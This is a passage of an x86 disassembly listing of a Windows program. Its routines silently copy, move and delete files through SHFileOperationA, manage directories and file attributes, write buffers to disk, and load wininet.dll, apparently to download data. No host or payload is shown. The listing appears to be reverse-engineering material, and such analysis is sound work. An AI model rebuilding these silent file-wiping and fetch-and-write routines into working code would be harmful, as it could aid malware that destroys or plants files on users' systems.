cmp [ebp+arg_C], 0
jle short loc_401B5E
mov ecx, [ebp+arg_C]
sub ecx, 1
mov [ebp+arg_C], ecx
cmp [ebp+arg_C], 0
jnz short loc_401B5E
jmp short loc_401B60
; ---------------------------------------------------------------------------
loc_401B5E: ; CODE XREF: sub_401ACF+7C�j
; sub_401ACF+8B�j
jmp short loc_401B00
; ---------------------------------------------------------------------------
loc_401B60: ; CODE XREF: sub_401ACF+3C�j
; sub_401ACF+8D�j
push offset a97 ; "97"
mov ecx, [ebp+arg_0]
call sub_4114FA
mov edx, [ebp+var_2004]
or edx, 1
mov [ebp+var_2004], edx
mov eax, [ebp+arg_0]
mov esp, ebp
pop ebp
retn 10h
sub_401ACF endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 230h
push edi
mov al, ds:byte_419C08
mov [ebp-230h], al
mov ecx, 41h
xor eax, eax
lea edi, [ebp-22Fh]
rep stosd
stosb
mov cl, ds:byte_419C0C
mov [ebp-108h], cl
mov ecx, 41h
xor eax, eax
lea edi, [ebp-107h]
rep stosd
stosb
push 104h
mov edx, [ebp+8]
push edx
lea eax, [ebp-230h]
push eax
call sub_402680
add esp, 0Ch
push 104h
mov ecx, [ebp+0Ch]
push ecx
lea edx, [ebp-108h]
push edx
call sub_402680
add esp, 0Ch
lea eax, [ebp-230h]
push eax
call sub_4021DB
add esp, 4
cmp eax, 1
jnz short loc_401C24
push 10000000h
call dword_413078 ; RtlSetLastWin32Error
xor eax, eax
jmp short loc_401C8D
; ---------------------------------------------------------------------------
loc_401C24: ; CODE XREF: HSho:00401C13�j
push 1Eh
push 0
lea ecx, [ebp-128h]
push ecx
call sub_411622 ; memset
add esp, 0Ch
lea edx, [ebp-230h]
mov [ebp-120h], edx
lea eax, [ebp-108h]
mov [ebp-11Ch], eax
mov dword ptr [ebp-124h], 2
mov word ptr [ebp-118h], 80h
cmp dword ptr [ebp+10h], 0
jz short loc_401C7B
mov cx, [ebp-118h]
or cx, 210h
mov [ebp-118h], cx
loc_401C7B: ; CODE XREF: HSho:00401C66�j
lea edx, [ebp-128h]
push edx
call dword_413288 ; SHFileOperationA
neg eax
sbb eax, eax
inc eax
loc_401C8D: ; CODE XREF: HSho:00401C22�j
pop edi
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401C92 proc near ; CODE XREF: sub_402C48+18E�p
; sub_402C48+1F1�p ...
var_140 = dword ptr -140h
var_13C = byte ptr -13Ch
var_13B = byte ptr -13Bh
var_34 = byte ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_24 = word ptr -24h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_401C92
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
sub esp, 130h
push ebx
push esi
push edi
mov [ebp+var_10], esp
mov al, ds:byte_419C10
mov [ebp+var_13C], al
mov ecx, 41h
xor eax, eax
lea edi, [ebp+var_13B]
rep stosd
stosb
push 104h
mov ecx, [ebp+arg_0]
push ecx
lea edx, [ebp+var_13C]
push edx
call sub_402680
add esp, 0Ch
lea eax, [ebp+var_13C]
push eax
call sub_4021DB
add esp, 4
cmp eax, 1
jnz short loc_401D0D
push 10000000h
call dword_413078 ; RtlSetLastWin32Error
xor eax, eax
jmp short loc_401D79
; ---------------------------------------------------------------------------
loc_401D0D: ; CODE XREF: sub_401C92+6A�j
push 1Eh
push 0
lea ecx, [ebp+var_34]
push ecx
call sub_411622 ; memset
add esp, 0Ch
lea edx, [ebp+var_13C]
mov [ebp+var_2C], edx
mov [ebp+var_30], 3
mov [ebp+var_24], 694h
mov [ebp+var_14], 0FFFFFFFFh
mov [ebp+var_4], 0
push 1Ah
call dword_4130E0 ; Sleep
lea eax, [ebp+var_34]
push eax
call dword_413288 ; SHFileOperationA
mov [ebp+var_14], eax
jmp short loc_401D69
; ---------------------------------------------------------------------------
mov ecx, [ebp+var_140]
call sub_411500
mov eax, offset loc_401D69
retn
; ---------------------------------------------------------------------------
loc_401D69: ; CODE XREF: sub_401C92+C4�j
; DATA XREF: sub_401C92+D1�o
mov [ebp+var_4], 0FFFFFFFFh
xor eax, eax
cmp [ebp+var_14], 0
setz al
loc_401D79: ; CODE XREF: sub_401C92+79�j
mov ecx, [ebp+var_C]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_401C92 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D8A proc near ; CODE XREF: sub_402C48+16D�p
; sub_404605+1B7�p ...
var_230 = byte ptr -230h
var_22F = byte ptr -22Fh
var_128 = byte ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = word ptr -118h
var_108 = byte ptr -108h
var_107 = byte ptr -107h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 230h
push edi
mov al, ds:byte_419C14
mov [ebp+var_230], al
mov ecx, 41h
xor eax, eax
lea edi, [ebp+var_22F]
rep stosd
stosb
mov cl, ds:byte_419C18
mov [ebp+var_108], cl
mov ecx, 41h
xor eax, eax
lea edi, [ebp+var_107]
rep stosd
stosb
push 104h
mov edx, [ebp+arg_0]
push edx
lea eax, [ebp+var_230]
push eax
call sub_402680
add esp, 0Ch
push 104h
mov ecx, [ebp+arg_4]
push ecx
lea edx, [ebp+var_108]
push edx
call sub_402680
add esp, 0Ch
lea eax, [ebp+var_230]
push eax
call sub_4021DB
add esp, 4
cmp eax, 1
jnz short loc_401E1E
push 10000000h
call dword_413078 ; RtlSetLastWin32Error
xor eax, eax
jmp short loc_401E81
; ---------------------------------------------------------------------------
loc_401E1E: ; CODE XREF: sub_401D8A+83�j
push 1Eh
push 0
lea ecx, [ebp+var_128]
push ecx
call sub_411622 ; memset
add esp, 0Ch
lea edx, [ebp+var_230]
mov [ebp+var_120], edx
lea eax, [ebp+var_108]
mov [ebp+var_11C], eax
mov [ebp+var_124], 4
mov [ebp+var_118], 80h
mov cx, [ebp+var_118]
or cx, 614h
mov [ebp+var_118], cx
lea edx, [ebp+var_128]
push edx
call dword_413288 ; SHFileOperationA
neg eax
sbb eax, eax
inc eax
loc_401E81: ; CODE XREF: sub_401D8A+92�j
pop edi
mov esp, ebp
pop ebp
retn
sub_401D8A endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 230h
push edi
mov al, ds:byte_419C1C
mov [ebp-230h], al
mov ecx, 41h
xor eax, eax
lea edi, [ebp-22Fh]
rep stosd
stosb
mov cl, ds:byte_419C20
mov [ebp-108h], cl
mov ecx, 41h
xor eax, eax
lea edi, [ebp-107h]
rep stosd
stosb
push 104h
mov edx, [ebp+8]
push edx
lea eax, [ebp-230h]
push eax
call sub_402680
add esp, 0Ch
push 104h
mov ecx, [ebp+0Ch]
push ecx
lea edx, [ebp-108h]
push edx
call sub_402680
add esp, 0Ch
push 1Eh
push 0
lea eax, [ebp-128h]
push eax
call sub_411622 ; memset
add esp, 0Ch
lea ecx, [ebp-230h]
mov [ebp-120h], ecx
lea edx, [ebp-108h]
mov [ebp-11Ch], edx
mov dword ptr [ebp-124h], 2
cmp dword ptr [ebp+10h], 0
jz short loc_401F44
mov ax, [ebp-118h]
or ax, 210h
mov [ebp-118h], ax
loc_401F44: ; CODE XREF: HSho:00401F30�j
lea ecx, [ebp-128h]
push ecx
call dword_413288 ; SHFileOperationA
neg eax
sbb eax, eax
inc eax
pop edi
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 234h
push edi
mov al, ds:byte_419C24
mov [ebp-234h], al
mov ecx, 41h
xor eax, eax
lea edi, [ebp-233h]
rep stosd
stosb
push 104h
mov ecx, [ebp+8]
push ecx
lea edx, [ebp-234h]
push edx
call sub_402680
add esp, 0Ch
push 1Eh
push 0
lea eax, [ebp-24h]
push eax
call sub_411622 ; memset
add esp, 0Ch
lea ecx, [ebp-234h]
mov [ebp-1Ch], ecx
mov dword ptr [ebp-20h], 3
cmp dword ptr [ebp+0Ch], 0
jz short loc_401FCB
mov dx, [ebp-14h]
or dx, 210h
mov [ebp-14h], dx
loc_401FCB: ; CODE XREF: HSho:00401FBC�j
mov al, ds:byte_419C28
mov [ebp-12Ch], al
mov ecx, 41h
xor eax, eax
lea edi, [ebp-12Bh]
rep stosd
lea ecx, [ebp-12Ch]
push ecx
push 104h
call dword_41302C ; GetCurrentDirectoryA
mov dword ptr [ebp-4], 1
loc_401FFE: ; CODE XREF: HSho:00402030�j
cmp dword ptr [ebp-4], 0
jz short loc_402032
lea edx, [ebp-234h]
push edx
lea eax, [ebp-12Ch]
push eax
call sub_40239F
add esp, 8
test eax, eax
jnz short loc_402032
lea ecx, [ebp-12Ch]
push ecx
call sub_402296
add esp, 4
mov [ebp-4], eax
jmp short loc_401FFE
; ---------------------------------------------------------------------------
loc_402032: ; CODE XREF: HSho:00402002�j
; HSho:0040201C�j
lea edx, [ebp-24h]
push edx
call dword_413288 ; SHFileOperationA
neg eax
sbb eax, eax
inc eax
pop edi
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 33Ch
push edi
mov al, ds:byte_419C2C
mov [ebp-33Ch], al
mov ecx, 41h
xor eax, eax
lea edi, [ebp-33Bh]
rep stosd
stosb
mov cl, ds:byte_419C30
mov [ebp-108h], cl
mov ecx, 41h
xor eax, eax
lea edi, [ebp-107h]
rep stosd
stosb
push 104h
mov edx, [ebp+8]
push edx
lea eax, [ebp-33Ch]
push eax
call sub_402680
add esp, 0Ch
push 104h
mov ecx, [ebp+0Ch]
push ecx
lea edx, [ebp-108h]
push edx
call sub_402680
add esp, 0Ch
push 1Eh
push 0
lea eax, [ebp-12Ch]
push eax
call sub_411622 ; memset
add esp, 0Ch
lea ecx, [ebp-33Ch]
mov [ebp-124h], ecx
lea edx, [ebp-108h]
mov [ebp-120h], edx
mov dword ptr [ebp-128h], 1
cmp dword ptr [ebp+10h], 0
jz short loc_402104
mov ax, [ebp-11Ch]
or ax, 210h
mov [ebp-11Ch], ax
loc_402104: ; CODE XREF: HSho:004020F0�j
mov cl, ds:byte_419C34
mov [ebp-234h], cl
mov ecx, 41h
xor eax, eax
lea edi, [ebp-233h]
rep stosd
lea edx, [ebp-234h]
push edx
push 104h
call dword_41302C ; GetCurrentDirectoryA
mov dword ptr [ebp-10Ch], 1
loc_40213B: ; CODE XREF: HSho:00402180�j
cmp dword ptr [ebp-10Ch], 0
jz short loc_402182
lea eax, [ebp-33Ch]
push eax
lea ecx, [ebp-234h]
push ecx
call sub_40239F
add esp, 8
test eax, eax
jnz short loc_402182
push 0
call sub_402296
add esp, 4
mov [ebp-10Ch], eax
lea edx, [ebp-234h]
push edx
push 104h
call dword_41302C ; GetCurrentDirectoryA
jmp short loc_40213B
; ---------------------------------------------------------------------------
loc_402182: ; CODE XREF: HSho:00402142�j
; HSho:0040215C�j
lea eax, [ebp-12Ch]
push eax
call dword_413288 ; SHFileOperationA
neg eax
sbb eax, eax
inc eax
pop edi
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402199 proc near ; CODE XREF: sub_404A2D+F�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0
mov eax, [ebp+arg_0]
push eax
call dword_413030 ; CreateDirectoryA
pop ebp
retn
sub_402199 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, [ebp+8]
push eax
call dword_413034 ; RemoveDirectoryA
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, [ebp+0Ch]
push eax
mov ecx, [ebp+8]
push ecx
call dword_413038 ; SetFileAttributesA
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, [ebp+8]
push eax
call dword_41303C ; GetFileAttributesA
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4021DB proc near ; CODE XREF: HSho:00401C08�p
; sub_401C92+5F�p ...
var_144 = dword ptr -144h
var_140 = dword ptr -140h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 144h
push 140h
push 0
lea eax, [ebp+var_140]
push eax
call sub_411622 ; memset
add esp, 0Ch
lea ecx, [ebp+var_140]
push ecx
mov edx, [ebp+arg_0]
push edx
call dword_413044 ; FindFirstFileA
mov [ebp+var_144], eax
cmp [ebp+var_144], 0FFFFFFFFh
jnz short loc_40221E
xor eax, eax
jmp short loc_402292
; ---------------------------------------------------------------------------
loc_40221E: ; CODE XREF: sub_4021DB+3D�j
mov eax, [ebp+var_140]
or al, 10h
cmp [ebp+var_140], eax
jnz short loc_402280
loc_40222E: ; CODE XREF: sub_4021DB:loc_40226A�j
lea ecx, [ebp+var_140]
push ecx
mov edx, [ebp+var_144]
push edx
call dword_413080 ; FindNextFileA
test eax, eax
jz short loc_40226C
mov eax, [ebp+var_140]
or al, 10h
cmp [ebp+var_140], eax
jz short loc_40226A
mov ecx, [ebp+var_144]
push ecx
call dword_41307C ; FindClose
mov eax, 2
jmp short loc_402292
; ---------------------------------------------------------------------------
loc_40226A: ; CODE XREF: sub_4021DB+79�j
jmp short loc_40222E
; ---------------------------------------------------------------------------
loc_40226C: ; CODE XREF: sub_4021DB+69�j
mov edx, [ebp+var_144]
push edx
call dword_41307C ; FindClose
mov eax, 1
jmp short loc_402292
; ---------------------------------------------------------------------------
loc_402280: ; CODE XREF: sub_4021DB+51�j
mov eax, [ebp+var_144]
push eax
call dword_41307C ; FindClose
mov eax, 2
loc_402292: ; CODE XREF: sub_4021DB+41�j
; sub_4021DB+8D�j ...
mov esp, ebp
pop ebp
retn
sub_4021DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402296 proc near ; CODE XREF: HSho:00402025�p
; HSho:00402160�p
var_110 = dword ptr -110h
var_10C = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push edi
mov al, ds:byte_419C38
mov [ebp+var_10C], al
mov ecx, 41h
xor eax, eax
lea edi, [ebp+var_10B]
rep stosd
lea ecx, [ebp+var_10C]
push ecx
push 104h
call dword_41302C ; GetCurrentDirectoryA
lea edx, [ebp+var_10C]
push edx
call sub_402435
add esp, 4
movsx eax, al
test eax, eax
jz short loc_4022E9
xor eax, eax
jmp loc_40239A
; ---------------------------------------------------------------------------
loc_4022E9: ; CODE XREF: sub_402296+4A�j
lea ecx, [ebp+var_10C]
push ecx
call sub_41162E ; strlen
add esp, 4
mov [ebp+var_110], eax
mov edx, [ebp+var_110]
sub edx, 1
mov [ebp+var_4], edx
jmp short loc_402315
; ---------------------------------------------------------------------------
loc_40230C: ; CODE XREF: sub_402296:loc_40237D�j
mov eax, [ebp+var_4]
sub eax, 1
mov [ebp+var_4], eax
loc_402315: ; CODE XREF: sub_402296+74�j
cmp [ebp+var_4], 0
jl short loc_40237F
mov ecx, [ebp+var_4]
movsx edx, [ebp+ecx+var_10C]
cmp edx, 5Ch
jnz short loc_40237D
mov eax, [ebp+var_4]
mov [ebp+eax+var_10C], 0
cmp [ebp+arg_0], 0
jz short loc_40234F
lea ecx, [ebp+var_10C]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_411628 ; strcpy
add esp, 8
loc_40234F: ; CODE XREF: sub_402296+A4�j
lea eax, [ebp+var_10C]
push eax
call sub_402435
add esp, 4
movsx ecx, al
test ecx, ecx
jz short loc_402369
xor eax, eax
jmp short loc_40239A
; ---------------------------------------------------------------------------
loc_402369: ; CODE XREF: sub_402296+CD�j
lea edx, [ebp+var_10C]
push edx
call dword_413048 ; SetCurrentDirectoryA
mov eax, 1
jmp short loc_40239A
; ---------------------------------------------------------------------------
loc_40237D: ; CODE XREF: sub_402296+93�j
jmp short loc_40230C
; ---------------------------------------------------------------------------
loc_40237F: ; CODE XREF: sub_402296+83�j
cmp [ebp+arg_0], 0
jz short loc_402398
lea eax, [ebp+var_10C]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_411628 ; strcpy
add esp, 8
loc_402398: ; CODE XREF: sub_402296+ED�j
xor eax, eax
loc_40239A: ; CODE XREF: sub_402296+4E�j
; sub_402296+D1�j ...
pop edi
mov esp, ebp
pop ebp
retn
sub_402296 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40239F proc near ; CODE XREF: HSho:00402012�p
; HSho:00402152�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
mov eax, [ebp+arg_0]
push eax
call sub_41162E ; strlen
add esp, 4
mov [ebp+var_4], eax
mov ecx, [ebp+arg_4]
push ecx
call sub_41162E ; strlen
add esp, 4
mov [ebp+var_C], eax
mov edx, [ebp+var_C]
sub edx, 1
cmp [ebp+var_4], edx
jb short loc_4023D3
xor eax, eax
jmp short loc_402430
; ---------------------------------------------------------------------------
loc_4023D3: ; CODE XREF: sub_40239F+2E�j
mov [ebp+var_8], 0
jmp short loc_4023E5
; ---------------------------------------------------------------------------
loc_4023DC: ; CODE XREF: sub_40239F:loc_40241D�j
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
loc_4023E5: ; CODE XREF: sub_40239F+3B�j
mov ecx, [ebp+var_8]
cmp ecx, [ebp+var_4]
jnb short loc_40241F
mov edx, [ebp+arg_0]
add edx, [ebp+var_8]
movsx eax, byte ptr [edx]
push eax
call dword_4131F4 ; toupper
add esp, 4
mov esi, eax
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_8]
movsx edx, byte ptr [ecx]
push edx
call dword_4131F4 ; toupper
add esp, 4
cmp esi, eax
jz short loc_40241D
xor eax, eax
jmp short loc_402430
; ---------------------------------------------------------------------------
loc_40241D: ; CODE XREF: sub_40239F+78�j
jmp short loc_4023DC
; ---------------------------------------------------------------------------
loc_40241F: ; CODE XREF: sub_40239F+4C�j
mov eax, [ebp+arg_4]
add eax, [ebp+var_8]
movsx ecx, byte ptr [eax]
xor eax, eax
cmp ecx, 5Ch
setz al
loc_402430: ; CODE XREF: sub_40239F+32�j
; sub_40239F+7C�j
pop esi
mov esp, ebp
pop ebp
retn
sub_40239F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402435 proc near ; CODE XREF: sub_402296+3D�p
; sub_402296+C0�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
push eax
call sub_41162E ; strlen
add esp, 4
mov [ebp+var_4], eax
cmp [ebp+var_4], 2
jl short loc_402454
cmp [ebp+var_4], 3
jle short loc_402458
loc_402454: ; CODE XREF: sub_402435+17�j
xor al, al
jmp short loc_4024B1
; ---------------------------------------------------------------------------
loc_402458: ; CODE XREF: sub_402435+1D�j
mov ecx, [ebp+arg_0]
movsx edx, byte ptr [ecx]
push edx
call dword_4131F4 ; toupper
add esp, 4
cmp eax, 41h
jl short loc_402482
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
push ecx
call dword_4131F4 ; toupper
add esp, 4
cmp eax, 5Ah
jle short loc_402486
loc_402482: ; CODE XREF: sub_402435+36�j
xor al, al
jmp short loc_4024B1
; ---------------------------------------------------------------------------
loc_402486: ; CODE XREF: sub_402435+4B�j
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx+1]
cmp eax, 3Ah
jz short loc_402496
xor al, al
jmp short loc_4024B1
; ---------------------------------------------------------------------------
loc_402496: ; CODE XREF: sub_402435+5B�j
cmp [ebp+var_4], 3
jnz short loc_4024AC
mov ecx, [ebp+arg_0]
movsx edx, byte ptr [ecx+2]
cmp edx, 5Ch
jz short loc_4024AC
xor al, al
jmp short loc_4024B1
; ---------------------------------------------------------------------------
loc_4024AC: ; CODE XREF: sub_402435+65�j
; sub_402435+71�j
mov eax, [ebp+arg_0]
mov al, [eax]
loc_4024B1: ; CODE XREF: sub_402435+21�j
; sub_402435+4F�j ...
mov esp, ebp
pop ebp
retn
sub_402435 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4024B5 proc near ; CODE XREF: HSho:0040257F�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_C], ecx
mov eax, [ebp+arg_0]
push eax
call dword_4131D8 ; ftell
add esp, 4
mov [ebp+var_4], eax
push 2
push 0
mov ecx, [ebp+arg_0]
push ecx
call dword_4131F0 ; fseek
add esp, 0Ch
mov edx, [ebp+arg_0]
push edx
call dword_4131D8 ; ftell
add esp, 4
mov [ebp+var_8], eax
push 0
mov eax, [ebp+var_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call dword_4131F0 ; fseek
add esp, 0Ch
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn 4
sub_4024B5 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset loc_411AFC
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 30h
mov [ebp-34h], ecx
mov dword ptr [ebp-30h], 0
mov dword ptr [ebp-4], 1
lea ecx, [ebp-1Ch]
call sub_41151E
mov byte ptr [ebp-4], 2
mov dword ptr [ebp-14h], 0
mov dword ptr [ebp-18h], 0
mov dword ptr [ebp-10h], 0
push offset aR_0 ; "r"
lea ecx, [ebp+0Ch]
call sub_4026A0
push eax
call dword_4131C4 ; fopen
add esp, 8
mov [ebp-24h], eax
cmp dword ptr [ebp-24h], 0
jz short loc_4025E0
mov eax, [ebp-24h]
push eax
mov ecx, [ebp-34h]
call sub_4024B5
mov [ebp-14h], eax
mov ecx, [ebp-14h]
push ecx
call dword_4131C8 ; malloc
add esp, 4
mov [ebp-10h], eax
mov dword ptr [ebp-28h], 0
jmp short loc_4025A9
; ---------------------------------------------------------------------------
loc_4025A0: ; CODE XREF: HSho:004025BA�j
mov edx, [ebp-28h]
add edx, 1
mov [ebp-28h], edx
loc_4025A9: ; CODE XREF: HSho:0040259E�j
mov eax, [ebp-28h]
cmp eax, [ebp-14h]
jge short loc_4025BC
mov ecx, [ebp-10h]
add ecx, [ebp-28h]
mov byte ptr [ecx], 0Ah
jmp short loc_4025A0
; ---------------------------------------------------------------------------
loc_4025BC: ; CODE XREF: HSho:004025AF�j
mov edx, [ebp-24h]
push edx
push 1
mov eax, [ebp-14h]
push eax
mov ecx, [ebp-10h]
push ecx
call dword_413254 ; fread
add esp, 10h
mov edx, [ebp-24h]
push edx
call dword_4131D0 ; fclose
add esp, 4
loc_4025E0: ; CODE XREF: HSho:00402576�j
cmp dword ptr [ebp-10h], 0
jz short loc_402630
mov eax, [ebp-14h]
push eax
push 0
mov ecx, [ebp-10h]
push ecx
lea edx, [ebp-2Ch]
push edx
lea ecx, [ebp-20h]
call sub_401ACF
mov [ebp-38h], eax
mov eax, [ebp-38h]
mov [ebp-3Ch], eax
mov byte ptr [ebp-4], 3
mov ecx, [ebp-3Ch]
push ecx
lea ecx, [ebp-1Ch]
call sub_411518
mov byte ptr [ebp-4], 2
lea ecx, [ebp-2Ch]
call sub_411512
mov edx, [ebp-10h]
push edx
call dword_4131D4 ; free
add esp, 4
jmp short loc_40263D
; ---------------------------------------------------------------------------
loc_402630: ; CODE XREF: HSho:004025E4�j
push offset dword_419C3C
lea ecx, [ebp-1Ch]
call sub_41150C
loc_40263D: ; CODE XREF: HSho:0040262E�j
lea eax, [ebp-1Ch]
push eax
mov ecx, [ebp+8]
call sub_411506
mov ecx, [ebp-30h]
or ecx, 1
mov [ebp-30h], ecx
mov byte ptr [ebp-4], 1
lea ecx, [ebp-1Ch]
call sub_411512
mov byte ptr [ebp-4], 0
lea ecx, [ebp+0Ch]
call sub_411512
mov eax, [ebp+8]
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402680 proc near ; CODE XREF: HSho:00401BE1�p
; HSho:00401BF9�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call dword_413200 ; _mbsnbcpy
add esp, 0Ch
pop ebp
retn
sub_402680 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4026A0 proc near ; CODE XREF: HSho:00402560�p
; sub_4064D9+1D�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov eax, [eax]
mov esp, ebp
pop ebp
retn
sub_4026A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4026B0 proc near ; CODE XREF: sub_402A1E+7F�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax], offset off_4132CC
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_4026B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4026C7 proc near ; CODE XREF: sub_4029F0+A�p
; sub_402BB1+26�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax], offset off_4132CC
mov esp, ebp
pop ebp
retn
sub_4026C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4026DB proc near ; CODE XREF: sub_402C48+A6�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov [ebp+var_14], ecx
mov [ebp+var_8], 0
mov [ebp+var_4], 0
lea eax, [ebp+var_8]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov ecx, [ebp+var_14]
call sub_4027A4
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jbe loc_402798
cmp [ebp+arg_4], 0
jz short loc_402776
push 0
push 8000000h
push 2
push 0
push 0
push 40000000h
mov edx, [ebp+arg_4]
push edx
call dword_413018 ; CreateFileA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0FFFFFFFFh
jnz short loc_40273E
xor al, al
jmp short loc_40279E
; ---------------------------------------------------------------------------
loc_40273E: ; CODE XREF: sub_4026DB+5D�j
mov [ebp+var_C], 0
push 0
lea eax, [ebp+var_C]
push eax
mov ecx, [ebp+var_4]
push ecx
mov edx, [ebp+var_14]
mov eax, [edx+4]
push eax
mov ecx, [ebp+var_10]
push ecx
call dword_413050 ; WriteFile
mov edx, [ebp+var_10]
push edx
call dword_413020 ; CloseHandle
mov eax, [ebp+var_C]
cmp eax, [ebp+var_4]
jz short loc_402776
xor al, al
jmp short loc_40279E
; ---------------------------------------------------------------------------
loc_402776: ; CODE XREF: sub_4026DB+38�j
; sub_4026DB+95�j
mov ecx, [ebp+var_14]
cmp dword ptr [ecx+4], 0
jz short loc_402796
mov edx, [ebp+var_14]
mov eax, [edx+4]
push eax
call dword_41304C ; GlobalFree
mov ecx, [ebp+var_14]
mov dword ptr [ecx+4], 0
loc_402796: ; CODE XREF: sub_4026DB+A2�j
jmp short loc_40279C
; ---------------------------------------------------------------------------
loc_402798: ; CODE XREF: sub_4026DB+2E�j
xor al, al
jmp short loc_40279E
; ---------------------------------------------------------------------------
loc_40279C: ; CODE XREF: sub_4026DB:loc_402796�j
mov al, 1
loc_40279E: ; CODE XREF: sub_4026DB+61�j
; sub_4026DB+99�j ...
mov esp, ebp
pop ebp
retn 8
sub_4026DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4027A4 proc near ; CODE XREF: sub_4026DB+22�p
; sub_402F1E+35�p
var_2034 = dword ptr -2034h
var_2030 = dword ptr -2030h
var_202C = dword ptr -202Ch
var_2028 = dword ptr -2028h
var_2024 = dword ptr -2024h
var_2020 = byte ptr -2020h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2034h
call sub_4115D0
mov [ebp+var_2034], ecx
cmp [ebp+arg_0], 0
jnz short loc_4027C4
xor eax, eax
jmp loc_4029EA
; ---------------------------------------------------------------------------
loc_4027C4: ; CODE XREF: sub_4027A4+17�j
mov eax, [ebp+var_2034]
cmp dword ptr [eax+4], 0
jz short loc_4027ED
mov ecx, [ebp+var_2034]
mov edx, [ecx+4]
push edx
call dword_41304C ; GlobalFree
mov eax, [ebp+var_2034]
mov dword ptr [eax+4], 0
loc_4027ED: ; CODE XREF: sub_4027A4+2A�j
push offset aWininet_dll ; "wininet.dll"
call dword_4130DC ; LoadLibraryA
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jnz short loc_402808
xor eax, eax
jmp loc_4029EA
; ---------------------------------------------------------------------------
